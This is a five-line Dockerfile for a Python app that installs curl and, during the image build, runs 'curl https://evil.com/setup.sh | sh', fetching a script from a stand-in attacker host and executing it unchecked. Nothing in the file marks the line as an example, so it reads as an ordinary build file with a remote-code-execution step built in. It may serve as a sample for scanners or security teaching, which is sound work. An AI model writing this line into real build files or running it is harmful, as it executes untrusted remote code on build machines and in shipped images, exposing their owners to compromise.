FROM python:latest
ADD . /app
RUN apt-get update && apt-get install -y curl
RUN curl https://evil.com/setup.sh | sh
CMD ["python", "app.py"]
